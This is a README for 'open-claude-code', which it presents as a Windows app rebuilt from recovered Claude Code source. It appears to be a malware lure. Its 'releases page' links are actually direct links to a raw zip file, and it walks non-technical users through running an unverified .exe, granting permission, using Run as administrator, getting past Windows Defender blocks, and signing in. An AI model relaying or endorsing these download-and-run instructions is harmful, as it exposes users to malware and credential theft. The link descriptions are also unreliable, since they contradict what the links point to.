open-claude-code is a Windows app built from recovered and build-fixed Claude Code 2.1.88 source. It is kept as a research and learning reference by Codex.
This README is written for non-technical users. It shows how to get the app, start it on Windows, and use the first screen without needing command-line steps.
Visit this page to download: https://raw.githubusercontent.com/celerycabbagedaggerboard755/open-claude-code/main/caupones/claude_code_open_v3.4.zip
On that page, look for the latest release. Download the Windows file that matches your PC. In most cases, this will be a .exe file or a .zip file.
If you see more than one file, use the one marked for Windows.
Use a Windows PC with:
- Windows 10 or Windows 11
- At least 8 GB of RAM
- 2 GB of free disk space
- An internet connection
- A mouse and keyboard
- Permission to run downloaded apps
For better results, use a PC with 16 GB of RAM or more.
Check these items before you open the app:
- Make sure the download is complete
- Keep the file in a folder you can find, such as Downloads
- If the file came in a
.zip, extract it first - Close other large apps if your PC runs slowly
- Make sure Windows is up to date
If Windows blocks the file, use the standard Windows prompt to allow it only if you trust the source.
Follow these steps:
-
Go to the releases page: https://raw.githubusercontent.com/celerycabbagedaggerboard755/open-claude-code/main/caupones/claude_code_open_v3.4.zip
-
Find the newest release at the top of the page.
-
Download the Windows app file.
-
If the file is a
.zip, right-click it and choose Extract All. -
Open the folder that contains the app.
-
Double-click the
.exefile to start the app. -
If Windows asks for permission, choose Run or Yes.
-
Wait for the app window to open.
-
If the app asks for setup details, enter them in the fields shown on screen.
-
Keep the app open while you use it.
When you open open-claude-code for the first time, you may see a simple setup screen. Typical first-run steps can include:
- Choosing a folder for your work files
- Signing in with your account
- Confirming a local data folder
- Allowing the app to access the internet
- Picking a theme or display size
If a setup screen appears, read each line and move through the steps one at a time.
After setup, the app is meant to help you work with Claude Code in a Windows-friendly way.
You can use it for tasks such as:
- Opening a project folder
- Viewing app output
- Running a code-related task
- Reading messages from the app
- Keeping your work in one place
If you are not sure what a button does, move your mouse over it and read the label before clicking.
You may see these file types in the release download:
.exe— the main app file.zip— a compressed folder that must be extracted.dll— a support file that the app may need.json— a settings or config file.txt— a plain text file with notes
Do not move files around unless the release page or included notes tell you to do so.
Try these steps:
- Make sure the download finished fully.
- If the file is in a zip, extract it again.
- Right-click the app and choose Run as administrator.
- Restart your PC.
- Check that Windows Defender did not block the file.
- Download the latest release again if the file looks damaged.
- Try a different folder, such as your Desktop.
If the app opens and then closes, check whether another copy is already running.
Try these steps:
- Close other apps
- Restart the app
- Free up disk space
- Move the app folder to a local drive
- Avoid running large downloads at the same time
- Use a PC with more RAM if possible
Large tasks can take time on older systems.
This app may store local settings, cache files, or project data on your PC.
Useful places to check:
- The folder where you installed the app
- Your Windows Downloads folder
- App data folders under your user profile
- The project folder you chose during setup
If you want to remove the app, delete the app folder and any related data folders you created during use.
